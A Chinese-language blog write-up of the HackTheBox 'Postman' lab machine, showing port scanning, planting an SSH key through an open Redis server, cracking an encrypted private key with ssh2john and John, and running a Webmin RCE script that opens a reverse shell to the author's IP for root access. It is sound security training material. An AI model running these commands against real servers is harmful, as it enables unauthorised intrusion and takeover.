hackthebox - postman (考点:redis安全 & ssh2john & webmin安全)

1 扫描

22想到可能会有ssh登录,
80进web搜集信息,包括用dirbuster扫目录,但是没找到什么有价值的。
10000是webmin是远程管理系统。也没账号密码。

6379是redis服务,网上也有很多科普这里
理论上这应该是个在受信任内部环境运行的数据库工具,不应对外开放,既然对外了,可能这就是个利用突破口,可能连密码认证都没要。可以安装用这个工具利用apt install redis-tools

Scanning 1 hosts [131070 ports/host]
Discovered open port 10000/tcp on 10.10.10.160                                 
Discovered open port 6379/tcp on 10.10.10.160                                  
Discovered open port 80/tcp on 10.10.10.160                                    
Discovered open port 10000/udp on 10.10.10.160                                 
Discovered open port 22/tcp on 10.10.10.160    


Nmap scan report for 10.10.10.160
Host is up (0.25s latency).

PORT      STATE SERVICE
6379/tcp  open  redis


2 redis利用

网上找到这个。跟着这个步骤来redis
首先确认没有密码认证,可以直接进入,然后做ssh-key,存进去,就可以直接登录ssh了。
当然,目录有所不同,要稍微调整下。

C:\root> telnet 10.10.10.160 6379
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
echo "hey"
$3
hey
quit
+OK
Connection closed by foreign host.
C:\root> ssh-keygen -t rsa -C "crack@redis.io"
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:wYLTy+zxSCYXHb47wx1yjRVTmx+pPfJO+9gkRTrUlS8 crack@redis.io
The key's randomart image is:
+---[RSA 3072]----+
|        .   o.. o|
|     o + .   o =o|
|    o + =   . +o+|
|     + + o + .E+o|
|    . O S + .oo+o|
|     * = = .  oo.|
|      o * .   .o.|
|         o    o=.|
|              .o+|
+----[SHA256]-----+

C:\root> (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
C:\root> redis-cli -h 10.10.10.160 flushall
OK
C:\root> cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
OK
C:\root> redis-cli -h 10.10.10.160
10.10.10.160:6379> get crackit
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDFMVuRwJNstZ6CMXpId1g9tkMpOazJmbYwxs8qS4DiVMvfAxcqa+UjMicqIP1H3lAVlfRUhqPLkvwyYaHJsjKh+NRMiJ8JbQxEYaBEM/9O8JaSZVfWKP3N65MGUjl7+9yYNoSri0mR2t8PnoZtSCcuZJRFNSvqjBeus7fRW+o5u4FJOtAafkeetxIB3wxaiAIISuK8hOLRGPEgGZrI22eA6AI0Wgw5VUTctyULyjyxKGLDRsTU1Q3nYwrEmNtNLgDXFtT1tt65yaDqRA7xC1CcOAuMVWuHIW9pM+mkkBq9vFEMy3cgiDbTBPdEfs4nGVUQZp2Q1zzt4Vdq9z1de6cALj0tDXgQMxoiq9OTjwptrrbqQF5RV8eSMyYbnNVN+G0+yTwx3DJjxMfDc2eISX5M7Dbz0pEntRbdsViyNb681p8KJhYyeJ0avaYCIw/OMDlZhI5SoAbqVwmvH0kq/Os8bM0J4r3JYxJYAmhb6ZyGEQN2mFpUMMwRONNrDwIaBiE= crack@redis.io\n\n\n\n"
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> exit
C:\root> 

成功保存后ssh登录

ssh -i id_rsa redis@10.10.10.160

3 提权至matt

linpeas扫描工具没有找到什么有价值的。
可以换LinEnum脚本扫描这里
或者手工找找。
发现/opt/id_rsa.bak,有读的权限。他也是属于用户Matt

redis@Postman:/etc/redis$ find / -type f -user Matt -readable 2>/dev/null
/opt/id_rsa.bak
/home/Matt/.bashrc
/home/Matt/.selected_editor
/home/Matt/.profile
/home/Matt/.wget-hsts
/home/Matt/.bash_logout
/var/www/SimpleHTTPPutServer.py
redis@Postman:/etc/redis$ 

打开看,是加了密的ssh登录密码id_rsa
ssh2john解密成john形式,再john解码。kali2020好像没有自带这个工具,但是在john文件包里自带这个py

如此我们就拿到了Matt的账号密码。su Matt 就可以拿他的shell

C:\root> locate ssh2john 
/root/.local/share/Trash/files/JohnTheRipper/run/ssh2john.py
/root/exp/JohnTheRipper-bleeding-jumbo/run/ssh2john.py
/usr/share/john/ssh2john.py
C:\root> 




C:\root\htb\postman> python /root/exp/JohnTheRipper-bleeding-jumbo/run/ssh2john.py id_rsa > postman
C:\root\htb\postman>





C:\root\exp\JohnTheRipper-bleeding-jumbo\run> ./john postman --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (?)
1g 0:00:00:07 DONE (2020-05-20 22:54) 0.1358g/s 1948Kp/s 1948Kc/s 1948KC/sa6_123..*7¡Vamos!
Session completed. 
C:\root\exp\JohnTheRipper-bleeding-jumbo\run> 



在这里插入图片描述

4 提权至root (通过 webmin)

想到webmin还没用,它也有很多漏洞,可以直接rce拿shell。但漏洞基本是要密码认证的,也就是需要知道账号密码。
想到账号密码是否存在重复利用,比如matt的账号密码,尝试输入,成功登陆

看到版本号1.910.

在这里插入图片描述
github上搜webmin rce就可以搜到相关漏洞,找到对应版本的。有两个py脚本,不过其中有个似乎还要我们自己转换perl、base什么的看着麻烦,选择另一个简单的。这里

执行

python webmin.py https://10.10.10.160:10000 Matt computer2008 10.10.14.43 1337

本机监听,收到,拿下root
在这里插入图片描述

展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 1024 设计师: 上身试试
应支付0元
点击重新获取
扫码支付

支付成功即可阅读